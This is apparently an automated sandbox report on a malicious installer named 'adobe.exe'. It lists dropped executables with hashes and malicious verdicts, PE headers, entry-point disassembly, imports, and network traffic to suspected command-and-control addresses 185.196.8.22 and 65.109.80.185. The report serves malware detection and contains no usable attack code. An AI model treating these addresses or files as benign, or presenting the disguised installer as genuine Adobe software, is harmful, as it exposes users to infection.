Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:InnoSetup Log AVI formatter tool, version 0x30, 8188 bytes, 226546\user, "C:\Users\user\AppData\Local\AVI formatter tool"
Category:dropped
Size (bytes):8188
Entropy (8bit):4.996949785393219
Encrypted:false
SSDEEP:96:CuZg5WgDX7pbbjHm4JOIhNH4cVSQs0LnrimDfMbS4m9VKvjr:Cz5WgD7pLGTIhycVSQ1nrimDfMvm9MP
MD5:8BD0F7BCB39EBD29CADC16E0218ADEAC
SHA1:E589260A04F7D0571765DC94794E3A2206F7723A
SHA-256:BF0416A84FFE3A0FE890A01359DF213102FD623117AFA98A8261B4E2508AAA9D
SHA-512:23CB6737198A8541C61776A730A99BC219F32931AF5A04754D06C13D4D60622576C490798801CCAFAE0E1FDEFCB2455B0C96617ACEEDA2D8A31E7B9BEB71EBDB
Malicious:false
Preview:Inno Setup Uninstall Log (b)....................................AVI formatter tool..............................................................................................................AVI formatter tool..............................................................................................................0...8.......%................................................................................................................e}.........J'........O....226546.user/C:\Users\user\AppData\Local\AVI formatter tool.............7.... .....t....2.IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:User32.

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):715038
Entropy (8bit):6.506117629405352
Encrypted:false
SSDEEP:12288:RRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc/:LObekYkfohrP337uzHnA6cgqpeEFHS9M
MD5:B3409D6A8032BDC34CC66F558D065980
SHA1:D9FADAD0B88C38243D51D5D600C021F7EB787365
SHA-256:2B7E19859B5E49083A988005C98C6E315B0B3D34C45AEACCB6C8E5DE68D4D94E
SHA-512:BDB716FFDB409CF64C121F4C8EBF1AF01DB004992187BA1CD667D237FC015657B1A4C6F668A3F86EA6DC138004D382A73BB8242AD53DA838FFB332E7843EC125
Malicious:true
Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4096
Entropy (8bit):4.026670007889822
Encrypted:false
SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
MD5:0EE914C6F0BB93996C75941E1AD629C6
SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2560
Entropy (8bit):2.8818118453929262
Encrypted:false
SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:A69559718AB506675E907FE49DEB71E9
SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):13312
Entropy (8bit):5.745960477552938
Encrypted:false
SSDEEP:384:BXvhMwoSitz/bjx7yxnbdn+EHvbsHoOODCg:BZ7FEAbd+EDsIO
MD5:A813D18268AFFD4763DDE940246DC7E5
SHA1:C7366E1FD925C17CC6068001BD38EAEF5B42852F
SHA-256:E19781AABE466DD8779CB9C8FA41BBB73375447066BB34E876CF388A6ED63C64
SHA-512:B310ED4CD2E94381C00A6A370FCB7CC867EBE425D705B69CAAAAFFDAFBAB91F72D357966916053E72E68ECF712F2AF7585500C58BB53EC3E1D539179FCB45FB4
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...(...(...(..n ..(...(...(...$..(...$..(...$..(..Rich.(..................PE..L......B...........!..... ..........p........0....P..........................P.......................................;.......;..(............................@.......0...............................................0...............................text............ .................. ..`.rdata.......0.......$..............@..@.reloc.......@.......2..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):6144
Entropy (8bit):4.215994423157539
Encrypted:false
SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
MD5:4FF75F505FDDCC6A9AE62216446205D9
SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):23312
                                                                                                                                                        Entropy (8bit):4.596242908851566
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
                                                                                                                                                        MD5:92DC6EF532FBB4A5C3201469A5B5EB63
                                                                                                                                                        SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
                                                                                                                                                        SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
                                                                                                                                                        SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\Desktop\adobe.exe
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):704512
                                                                                                                                                        Entropy (8bit):6.498045515703036
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:ZRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc:jObekYkfohrP337uzHnA6cgqpeEFHS9A
                                                                                                                                                        MD5:EAF0354C6EA59246416F73EC28FB11AF
                                                                                                                                                        SHA1:EE6CF822FF6D82F4AE958D90EEBA282D5EF48DA1
                                                                                                                                                        SHA-256:958C0E917DA7DF3215B28005FAE0ACACDBA44CE4AFA8BCDCED6AAFC1357D7FEE
                                                                                                                                                        SHA-512:68BDF0502F0432BE7F45FE41B16D0D0FD9F8BF69613651C5BF0E26307F8B404EB32E19155538C44925950ADA495E4FC524EE07A6AAA34F2284D6718B49501150
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.998783197769266
TrID:
• Win32 Executable (generic) a (10002005/4) 98.86%
• Inno Setup installer (109748/4) 1.08%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name:adobe.exe
File size:4'855'286 bytes
MD5:e9a2997ee4cfb48cb3988f3048e041e9
SHA1:303d4cb34333e085c47ec565a25abcfa2376db6e
SHA256:6b05ea2717ccbe9837f6b5108900f96c169d9e252b595ddfec97b071fb67dcae
SHA512:a8f65dc8df2d15d2201f6acae8d358b370f2df7dce0713358f2f01b0a8dd06e5fe0357d63e4b254f8300df28fd22146b0b79a516ce6f31a36d61fecbcfd4bbe0
SSDEEP:98304:QImrB3xNJVSKxvPROQR9FMrBcbYQ6RF+I5GtvB7waAipLdAP95g:HS3xNJMKxXkwFMrBu9m+VfDldQ95g
TLSH:21263324FD732332C5B20CB89A66BF1774346C3F92F994352ADC4DFD5BA7542A6022A1
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x409c40
Entrypoint Section:CODE
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:1
OS Version Minor:0
File Version Major:1
File Version Minor:0
Subsystem Version Major:1
Subsystem Version Minor:0
Import Hash:884310b1928934402ea6fec1dbd3cf5e
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007FE0E062441Bh
call 00007FE0E0625622h
call 00007FE0E06258B1h
call 00007FE0E06278E8h
call 00007FE0E062792Fh
call 00007FE0E062A25Eh
call 00007FE0E062A3C5h
xor eax, eax
push ebp
push 0040A2FCh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A2C5h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007FE0E062AE2Bh
call 00007FE0E062AA5Eh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007FE0E0627F18h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007FE0E06244C7h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 0040738Ch
call 00007FE0E06287A7h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A27Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007FE0E062AE9Bh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007FE0E062AFDAh
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007FE0E0628BA8h
mov edx, dword ptr [000000F4h]
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| CODE | 0x1000 | 0x9364 | 0x9400 | False | 0.6148648648648649 | data | 6.56223225792919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| DATA | 0xb000 | 0x24c | 0x400 | False | 0.3154296875 | data | 2.753482278202086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| BSS | 0xc000 | 0xe4c | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0xd000 | 0x950 | 0xa00 | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0xe000 | 0x8 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0xf000 | 0x18 | 0x200 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .reloc | 0x10000 | 0x8b4 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .rsrc | 0x11000 | 0x2c00 | 0x2c00 | False | 0.3231534090909091 | data | 4.458098236885354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.28228476821192056
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken | Map
Dutch | Netherlands |
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 13, 2024 06:32:50.066613913 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.252819061 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.252942085 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.253227949 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.440485954 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482608080 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482676029 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482769966 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482775927 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.482810020 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482810974 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.482831955 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.482851982 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:50.482891083 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.482892036 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:50.487788916 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:50.696322918 CET | 2023 | 49736 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:50.696405888 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:50.696504116 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:50.696589947 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:50.904870033 CET | 2023 | 49736 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:50.904982090 CET | 2023 | 49736 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:50.905002117 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:51.114022017 CET | 2023 | 49736 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:51.114131927 CET | 2023 | 49736 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:51.162251949 CET | 49736 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:53.119539976 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.306019068 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.401035070 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.401144981 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.510107994 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.696444035 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732130051 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732162952 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732180119 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732204914 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732218981 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.732223988 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:53.732273102 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.732273102 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.732301950 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:53.735656977 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:53.944207907 CET | 2023 | 49738 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:53.944364071 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:53.944452047 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:53.944480896 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:53.944523096 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:54.059176922 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.059952021 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.152597904 CET | 2023 | 49738 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:54.152656078 CET | 2023 | 49738 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:54.152690887 CET | 2023 | 49738 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:54.153258085 CET | 2023 | 49738 | 65.109.80.185 | 192.168.2.4
Jan 13, 2024 06:32:54.153464079 CET | 49738 | 2023 | 192.168.2.4 | 65.109.80.185
Jan 13, 2024 06:32:54.245136976 CET | 80 | 49735 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.246010065 CET | 80 | 49739 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.246113062 CET | 49735 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.246144056 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.247020006 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.433665991 CET | 80 | 49739 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.473670959 CET | 80 | 49739 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.473870993 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.588351965 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.589015007 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.774772882 CET | 80 | 49739 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.774962902 CET | 49739 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.775068045 CET | 80 | 49740 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.775203943 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.775568962 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:54.967932940 CET | 80 | 49740 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.992610931 CET | 80 | 49740 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:54.992688894 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.106118917 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.331656933 CET | 80 | 49740 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:55.331852913 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.449701071 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.450196981 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.635859013 CET | 80 | 49740 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:55.635956049 CET | 49740 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.636006117 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:55.636106014 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.636356115 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.822384119 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:55.852837086 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:55.852941990 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:55.962891102 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
Jan 13, 2024 06:32:56.184292078 CET | 80 | 49741 | 185.196.8.22 | 192.168.2.4
Jan 13, 2024 06:32:56.184398890 CET | 49741 | 80 | 192.168.2.4 | 185.196.8.22
